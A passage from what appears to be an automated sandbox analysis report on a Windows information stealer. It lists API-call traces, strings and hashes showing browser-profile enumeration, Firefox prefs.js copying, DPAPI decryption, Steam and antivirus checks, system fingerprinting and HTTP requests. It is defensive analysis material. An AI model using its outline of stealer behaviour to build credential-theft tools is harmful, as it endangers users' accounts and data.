                                                                                                                                                                                          • lstrcatA.KERNEL32(?,?), ref: 0003556D
                                                                                                                                                                                            • Part of subcall function 000304E7: lstrcpyA.KERNEL32(00000000,00000000,?,0003707B,000566CD,?,?,?,?,0003858F), ref: 0003050D
                                                                                                                                                                                            • Part of subcall function 00027FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0002E756,?,?,?), ref: 00027FC7
                                                                                                                                                                                            • Part of subcall function 00027FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0002E756,?,?,?), ref: 00027FDE
                                                                                                                                                                                            • Part of subcall function 00027FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0002E756,?,?,?), ref: 00027FF5
                                                                                                                                                                                            • Part of subcall function 00027FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0002E756,?,?,?), ref: 0002800C
                                                                                                                                                                                            • Part of subcall function 00027FAC: CloseHandle.KERNEL32(?,?,?,?,?,0002E756,?,?,?), ref: 00028034
                                                                                                                                                                                            • Part of subcall function 00036E97: CreateThread.KERNEL32(00000000,00000000,00036DC6,?,00000000,00000000), ref: 00036F36
                                                                                                                                                                                            • Part of subcall function 00036E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00036F3E
                                                                                                                                                                                          • FindNextFileA.KERNEL32(?,?), ref: 00035623
                                                                                                                                                                                          • FindClose.KERNEL32(?), ref: 00035637
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: lstrcat$File$Find$CloseCreate$AllocFirstHandleLocalNextObjectReadSingleSizeThreadWaitlstrcpywsprintf
                                                                                                                                                                                          • String ID: %s\%s
                                                                                                                                                                                          • API String ID: 1150833511-4073750446
                                                                                                                                                                                          • Opcode ID: d95e98fdc789dbe54757c6efa3f56bea0c066dc9a5411c66577c5f7978edbabb
                                                                                                                                                                                          • Instruction ID: ea88b76d37f7ba3106e411422513325ba736f497d2cde40c58bdd9475ffe3b37
                                                                                                                                                                                          • Opcode Fuzzy Hash: d95e98fdc789dbe54757c6efa3f56bea0c066dc9a5411c66577c5f7978edbabb
                                                                                                                                                                                          • Instruction Fuzzy Hash: 04512BB590022C9BCF60DF60DC89AD9B7BCAB09305F4045E5A60CE3251EB31ABC9CF65
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 000304E7: lstrcpyA.KERNEL32(00000000,00000000,?,0003707B,000566CD,?,?,?,?,0003858F), ref: 0003050D
                                                                                                                                                                                            • Part of subcall function 000305C7: lstrcpyA.KERNEL32(00000000,?,0000000C,000375E9,000566DA), ref: 000305F5
                                                                                                                                                                                            • Part of subcall function 000305C7: lstrcatA.KERNEL32(?,?), ref: 000305FF
                                                                                                                                                                                            • Part of subcall function 00030609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 0003061D
                                                                                                                                                                                            • Part of subcall function 00030609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 00030645
                                                                                                                                                                                            • Part of subcall function 00030609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 00030650
                                                                                                                                                                                            • Part of subcall function 0003058D: lstrcpyA.KERNEL32(00000000,?,00000000,000370BA,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 000305BD
                                                                                                                                                                                          • FindFirstFileA.KERNEL32(?,?,\*.*,0005682E,0002CC6B,?,?), ref: 0002BFC5
                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,00057470), ref: 0002BFE5
                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,00057474), ref: 0002BFFF
                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,Opera,00056843,00056842,00056837,00056836,00056833,00056832,0005682F), ref: 0002C08B
                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,Opera GX), ref: 0002C099
                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,Opera Crypto), ref: 0002C0A7
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                                                                                                                                                                          • String ID: Opera$Opera Crypto$Opera GX$\*.*
                                                                                                                                                                                          • API String ID: 2567437900-1710495004
                                                                                                                                                                                          • Opcode ID: ec3eba70b5732856b7f3c6797b5258f01e73d06003bbbf4432447df8affeac7d
                                                                                                                                                                                          • Instruction ID: ba868feaa2bb7455e52c24aea9561ff222c9b4c30d7f792a5eef50db08483bff
                                                                                                                                                                                          • Opcode Fuzzy Hash: ec3eba70b5732856b7f3c6797b5258f01e73d06003bbbf4432447df8affeac7d
                                                                                                                                                                                          • Instruction Fuzzy Hash: CD02E535941129ABDF62FB64ED56ADEB7B8AF04304F4141E1B908B7117DB30AF898F90
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 000351C2
                                                                                                                                                                                          • _memset.LIBCMT ref: 000351E5
                                                                                                                                                                                          • GetDriveTypeA.KERNEL32(?), ref: 000351EE
                                                                                                                                                                                          • lstrcpyA.KERNEL32(?,?), ref: 0003520E
                                                                                                                                                                                          • lstrcpyA.KERNEL32(?,?), ref: 00035229
                                                                                                                                                                                            • Part of subcall function 00034CC8: wsprintfA.USER32 ref: 00034D1C
                                                                                                                                                                                            • Part of subcall function 00034CC8: FindFirstFileA.KERNEL32(?,?), ref: 00034D33
                                                                                                                                                                                            • Part of subcall function 00034CC8: _memset.LIBCMT ref: 00034D4F
                                                                                                                                                                                            • Part of subcall function 00034CC8: _memset.LIBCMT ref: 00034D60
                                                                                                                                                                                            • Part of subcall function 00034CC8: StrCmpCA.SHLWAPI(?,000569F8), ref: 00034D81
                                                                                                                                                                                            • Part of subcall function 00034CC8: StrCmpCA.SHLWAPI(?,000569FC), ref: 00034D9B
                                                                                                                                                                                            • Part of subcall function 00034CC8: wsprintfA.USER32 ref: 00034DC2
                                                                                                                                                                                            • Part of subcall function 00034CC8: StrCmpCA.SHLWAPI(?,0005660F), ref: 00034DD6
                                                                                                                                                                                            • Part of subcall function 00034CC8: wsprintfA.USER32 ref: 00034DFF
                                                                                                                                                                                            • Part of subcall function 00034CC8: _memset.LIBCMT ref: 00034E28
                                                                                                                                                                                            • Part of subcall function 00034CC8: lstrcatA.KERNEL32(?,?), ref: 00034E3D
                                                                                                                                                                                          • lstrcpyA.KERNEL32(?,00000000), ref: 0003524A
                                                                                                                                                                                          • lstrlenA.KERNEL32(?), ref: 000352C4
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _memset$lstrcpywsprintf$Drive$FileFindFirstLogicalStringsTypelstrcatlstrlen
                                                                                                                                                                                          • String ID: %DRIVE_FIXED%$%DRIVE_REMOVABLE%$*%DRIVE_FIXED%*$*%DRIVE_REMOVABLE%*
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 000304E7: lstrcpyA.KERNEL32(00000000,00000000,?,0003707B,000566CD,?,?,?,?,0003858F), ref: 0003050D
                                                                                                                                                                                            • Part of subcall function 000305C7: lstrcpyA.KERNEL32(00000000,?,0000000C,000375E9,000566DA), ref: 000305F5
                                                                                                                                                                                            • Part of subcall function 000305C7: lstrcatA.KERNEL32(?,?), ref: 000305FF
                                                                                                                                                                                            • Part of subcall function 00030609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 0003061D
                                                                                                                                                                                            • Part of subcall function 00030609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 00030645
                                                                                                                                                                                            • Part of subcall function 00030609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 00030650
                                                                                                                                                                                            • Part of subcall function 0003058D: lstrcpyA.KERNEL32(00000000,?,00000000,000370BA,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 000305BD
                                                                                                                                                                                          • FindFirstFileA.KERNEL32(?,?,00057570,000568A3,?,?,?), ref: 0002D647
                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,00057574), ref: 0002D668
                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,00057578), ref: 0002D682
                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,prefs.js,0005757C,?,000568AE), ref: 0002D70E
                                                                                                                                                                                            • Part of subcall function 00031C4A: GetSystemTime.KERNEL32(?,00056701,?), ref: 00031C79
                                                                                                                                                                                          • CopyFileA.KERNEL32(?,?,00000001), ref: 0002D7E8
                                                                                                                                                                                          • DeleteFileA.KERNEL32(?), ref: 0002D8B3
                                                                                                                                                                                          • FindNextFileA.KERNELBASE(?,?), ref: 0002D956
                                                                                                                                                                                          • FindClose.KERNEL32(?), ref: 0002D96A
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextSystemTimelstrlen
                                                                                                                                                                                          • String ID: prefs.js
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • ??_U@YAPAXI@Z.MSVCRT(00064000,?,?,?), ref: 0002FB52
                                                                                                                                                                                          • OpenProcess.KERNEL32(t.exesvchost.exesvchost.exesvchost.exesvchost.exeOfficeClickToRun.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesihost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exectfmon,00000000,00000000), ref: 0002FB7E
                                                                                                                                                                                          • _memset.LIBCMT ref: 0002FBC1
                                                                                                                                                                                          • ??_V@YAXPAX@Z.MSVCRT(?), ref: 0002FD17
                                                                                                                                                                                            • Part of subcall function 0002F030: _memmove.LIBCMT ref: 0002F04A
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • t.exesvchost.exesvchost.exesvchost.exesvchost.exeOfficeClickToRun.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesihost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exectfmon, xrefs: 0002FB5D
                                                                                                                                                                                          • N0ZWFt, xrefs: 0002FC7E
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: OpenProcess_memmove_memset
                                                                                                                                                                                          • String ID: N0ZWFt$t.exesvchost.exesvchost.exesvchost.exesvchost.exeOfficeClickToRun.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesihost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exectfmon
                                                                                                                                                                                          • API String ID: 2647191932-2618821102
                                                                                                                                                                                          • Opcode ID: 5ea3eb4848f12eefc84f8b51558729a95fa2939ec3f6799fddf9e8270cc9a28b
                                                                                                                                                                                          • Instruction ID: 30c0d566e96db8eff76d0e154218483cae55fcd2b8faf282ca1f431055cb1b86
                                                                                                                                                                                          • Opcode Fuzzy Hash: 5ea3eb4848f12eefc84f8b51558729a95fa2939ec3f6799fddf9e8270cc9a28b
                                                                                                                                                                                          • Instruction Fuzzy Hash: 4F519FB1D0023D9FDF209B60ED85BEEB7B9AB44345F0000F9A609A7153DA716E88CF55
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 000304E7: lstrcpyA.KERNEL32(00000000,00000000,?,0003707B,000566CD,?,?,?,?,0003858F), ref: 0003050D
                                                                                                                                                                                            • Part of subcall function 000305C7: lstrcpyA.KERNEL32(00000000,?,0000000C,000375E9,000566DA), ref: 000305F5
                                                                                                                                                                                            • Part of subcall function 000305C7: lstrcatA.KERNEL32(?,?), ref: 000305FF
                                                                                                                                                                                            • Part of subcall function 00030609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 0003061D
                                                                                                                                                                                            • Part of subcall function 00030609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 00030645
                                                                                                                                                                                            • Part of subcall function 00030609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 00030650
                                                                                                                                                                                            • Part of subcall function 0003058D: lstrcpyA.KERNEL32(00000000,?,00000000,000370BA,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 000305BD
                                                                                                                                                                                          • FindFirstFileA.KERNEL32(?,?,00057424,00056822,?,?,?), ref: 0002B657
                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,00057428), ref: 0002B678
                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,0005742C), ref: 0002B692
                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,00057430,?,00056823), ref: 0002B71F
                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?), ref: 0002B780
                                                                                                                                                                                            • Part of subcall function 00030519: lstrcpyA.KERNEL32(00000000,?,?,00021D07,?,00037621), ref: 00030538
                                                                                                                                                                                            • Part of subcall function 0002ABE5: CopyFileA.KERNEL32(?,?,00000001), ref: 0002AC8A
                                                                                                                                                                                          • FindNextFileA.KERNELBASE(?,?), ref: 0002B8EB
                                                                                                                                                                                          • FindClose.KERNEL32(?), ref: 0002B8FF
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          • API ID: lstrcpy$FileFind$lstrcat$CloseCopyFirstNextlstrlen
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3801961486-0
                                                                                                                                                                                          • Opcode ID: d617edf7414c4575c64a2b3faccd6ff32343d05e15bda04645b5cc95770b02db
                                                                                                                                                                                          • Instruction ID: dd2b99f318c09c1dc38f38f3dbad88d48edca6bb06f9086288e05f255fdebe0a
                                                                                                                                                                                          • Opcode Fuzzy Hash: d617edf7414c4575c64a2b3faccd6ff32343d05e15bda04645b5cc95770b02db
                                                                                                                                                                                          • Instruction Fuzzy Hash: 5281DA7690052C9BCF61FB74ED4AADD77B8AB04314F8502A1FC08A7152EB349E998ED1
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 000324B2
                                                                                                                                                                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 000324D4
                                                                                                                                                                                          • Process32First.KERNEL32(00000000,00000128), ref: 000324E4
                                                                                                                                                                                          • Process32Next.KERNEL32(00000000,00000128), ref: 000324F6
                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,steam.exe), ref: 00032508
                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00032521
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          • API ID: Process32$CloseCreateFirstH_prolog3_catch_HandleNextSnapshotToolhelp32
                                                                                                                                                                                          • String ID: steam.exe
                                                                                                                                                                                          • API String ID: 1799959500-2826358650
                                                                                                                                                                                          • Opcode ID: 04b9bb7363c1e74cb8d7c170d6e7e0948cd69cb964538dfbe342a4c65669ef37
                                                                                                                                                                                          • Instruction ID: f6beeceb47dcb460189cd93829da0e2d26fc9bc4d6b0b69caf71db62e8a6e03e
                                                                                                                                                                                          • Opcode Fuzzy Hash: 04b9bb7363c1e74cb8d7c170d6e7e0948cd69cb964538dfbe342a4c65669ef37
                                                                                                                                                                                          • Instruction Fuzzy Hash: 25012CB1A01219DFEB619B64DC48BEE77FCAF08301F4001E5A40DE61A0EB349B80CB60
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 000304E7: lstrcpyA.KERNEL32(00000000,00000000,?,0003707B,000566CD,?,?,?,?,0003858F), ref: 0003050D
                                                                                                                                                                                          • GetKeyboardLayoutList.USER32(00000000,00000000,0005670D,?,?), ref: 00030E0C
                                                                                                                                                                                          • LocalAlloc.KERNEL32(00000040,00000000), ref: 00030E1A
                                                                                                                                                                                          • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00030E28
                                                                                                                                                                                          • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200,00000000), ref: 00030E57
                                                                                                                                                                                            • Part of subcall function 00030609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 0003061D
                                                                                                                                                                                            • Part of subcall function 00030609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 00030645
                                                                                                                                                                                            • Part of subcall function 00030609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 00030650
                                                                                                                                                                                            • Part of subcall function 0003058D: lstrcpyA.KERNEL32(00000000,?,00000000,000370BA,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 000305BD
                                                                                                                                                                                          • LocalFree.KERNEL32(00000000), ref: 00030EFF
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          • API ID: lstrcpy$KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcatlstrlen
                                                                                                                                                                                          • String ID: /
                                                                                                                                                                                          • API String ID: 507856799-4001269591
                                                                                                                                                                                          • Opcode ID: 38f7576281f5d7461e10bb3bef72b20c259520ea56a50ac89d82f31058ff3b10
                                                                                                                                                                                          • Instruction ID: 25d51bb0795ab884b92aefbdc9477618b35008a3ddf4da7a44c370ec5b94dbca
                                                                                                                                                                                          • Opcode Fuzzy Hash: 38f7576281f5d7461e10bb3bef72b20c259520ea56a50ac89d82f31058ff3b10
                                                                                                                                                                                          • Instruction Fuzzy Hash: DD314DB1901228AFCB61AF64EC8DBDEB3B8AB08300F5141E5F919A7112D7706EC58F60
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 00032589
                                                                                                                                                                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,0000013C,00037E31,.exe,00056CCC,00056CC8,00056CC4,00056CC0,00056CBC,00056CB8,00056CB4,00056CB0,00056CAC,00056CA8,00056CA4), ref: 000325A8
                                                                                                                                                                                          • Process32First.KERNEL32(00000000,00000128), ref: 000325B8
                                                                                                                                                                                          • Process32Next.KERNEL32(00000000,00000128), ref: 000325CA
                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?), ref: 000325DC
                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 000325F0
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Process32$CloseCreateFirstH_prolog3_catch_HandleNextSnapshotToolhelp32
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1799959500-0
                                                                                                                                                                                          • Opcode ID: ef9cd6a1c0c701d7d889bfb25948bb09d538d0e365a9e4d8e3a56f198e547c32
                                                                                                                                                                                          • Instruction ID: fc546bb9d9e2c4c31db48efcc72437c2067358bb6410d654073e036fa6970fa6
                                                                                                                                                                                          • Opcode Fuzzy Hash: ef9cd6a1c0c701d7d889bfb25948bb09d538d0e365a9e4d8e3a56f198e547c32
                                                                                                                                                                                          • Instruction Fuzzy Hash: 580144715015299FEB619B60DC18FEE77FC9F19301F4500E5E40DE6161EA348F809B35
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,0002823B), ref: 000280C4
                                                                                                                                                                                          • LocalAlloc.KERNEL32(00000040,0002823B,?,?,0002823B,0002CB95,?,?,?,?,?,?,?,0002CC90,?,?), ref: 000280D8
                                                                                                                                                                                          • LocalFree.KERNEL32(0002CB95,?,?,0002823B,0002CB95,?,?,?,?,?,?,?,0002CC90,?,?), ref: 000280FD
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Local$AllocCryptDataFreeUnprotect
                                                                                                                                                                                          • String ID: DPAPI
                                                                                                                                                                                          • API String ID: 2068576380-1690256801
                                                                                                                                                                                          • Opcode ID: 2ed3f7b9a87a97559742fba8df9e881af6d5acc2622ec60c97214ccf81e55112
                                                                                                                                                                                          • Instruction ID: 01a1da541e21463814c445aceab3c2b52dcfb2fc3f03625a928df0e3efbaae7b
                                                                                                                                                                                          • Opcode Fuzzy Hash: 2ed3f7b9a87a97559742fba8df9e881af6d5acc2622ec60c97214ccf81e55112
                                                                                                                                                                                          • Instruction Fuzzy Hash: 0901F475901218EFCF50DFA8D88489EBBB9FF4C714B118465E905E7310D7719E45CB90
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 000304E7: lstrcpyA.KERNEL32(00000000,00000000,?,0003707B,000566CD,?,?,?,?,0003858F), ref: 0003050D
                                                                                                                                                                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00056712,?,?), ref: 000314D4
                                                                                                                                                                                          • Process32First.KERNEL32(00000000,00000128), ref: 000314E4
                                                                                                                                                                                          • Process32Next.KERNEL32(00000000,00000128), ref: 00031542
                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 0003154D
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcpy
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 907984538-0
                                                                                                                                                                                          • Opcode ID: a25750d6d74f1c5ff62f6eac1875d57469ed7cc93cad6e4d0a4e32b383b6e84d
                                                                                                                                                                                          • Instruction ID: 8f5af88badad9fb6c6b69d4ed108784bf210036b3834d4fd410985166a796068
                                                                                                                                                                                          • Opcode Fuzzy Hash: a25750d6d74f1c5ff62f6eac1875d57469ed7cc93cad6e4d0a4e32b383b6e84d
                                                                                                                                                                                          • Instruction Fuzzy Hash: C511A975601218DBDB22AB64EC96BEE73BCAF48300F4001D1F909E7242DF34AE859F61
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 00030D49
                                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000), ref: 00030D50
                                                                                                                                                                                          • GetTimeZoneInformation.KERNEL32(?), ref: 00030D5F
                                                                                                                                                                                          • wsprintfA.USER32 ref: 00030D7D
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Heap$AllocInformationProcessTimeZonewsprintf
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 362916592-0
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,000213B9), ref: 00030C5F
                                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000,?,?,?,000213B9), ref: 00030C66
                                                                                                                                                                                          • GetUserNameA.ADVAPI32(00000000,000213B9), ref: 00030C7A
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Heap$AllocNameProcessUser
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1206570057-0
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: InfoSystemwsprintf
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2452939696-0
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • lstrcmpiW.KERNEL32(?,?,?,?,?,?,00021503,avghookx.dll,00038544), ref: 000214DF
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: lstrcmpi
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1586166983-0

                                                                                                                                                                                          Control-flow Graph

[Control-flow graph; legend: Executed / Not Executed. First block 25482-25593. API calls appearing in the graph: lstrlenA, StrCmpCA, InternetOpenA, InternetConnectA, HttpOpenRequestA, InternetSetOptionA, GetProcessHeap, HeapAlloc, HttpSendRequestA, HttpQueryInfoA, InternetReadFile, ExitProcess, InternetCloseHandle.]
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 000304E7: lstrcpyA.KERNEL32(00000000,00000000,?,0003707B,000566CD,?,?,?,?,0003858F), ref: 0003050D
                                                                                                                                                                                            • Part of subcall function 00030519: lstrcpyA.KERNEL32(00000000,?,?,00021D07,?,00037621), ref: 00030538
                                                                                                                                                                                            • Part of subcall function 00024AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00024AE8
                                                                                                                                                                                            • Part of subcall function 00024AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00024AEE
                                                                                                                                                                                            • Part of subcall function 00024AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00024AF4
                                                                                                                                                                                            • Part of subcall function 00024AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00024B06
                                                                                                                                                                                            • Part of subcall function 00024AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00024B0E
                                                                                                                                                                                          • lstrlenA.KERNEL32(?), ref: 00025519
                                                                                                                                                                                            • Part of subcall function 00031E5D: CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,00000000,0027E908,?,?,?,000328A1,?,?,00000000), ref: 00031E7D
                                                                                                                                                                                            • Part of subcall function 00031E5D: GetProcessHeap.KERNEL32(00000000,?,?,?,?,000328A1,?,?,00000000), ref: 00031E8A
                                                                                                                                                                                            • Part of subcall function 00031E5D: HeapAlloc.KERNEL32(00000000,?,?,?,000328A1,?,?,00000000), ref: 00031E91
                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,00056986,0005697B,0005697A,0005696F), ref: 00025588
                                                                                                                                                                                          • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 000255AA
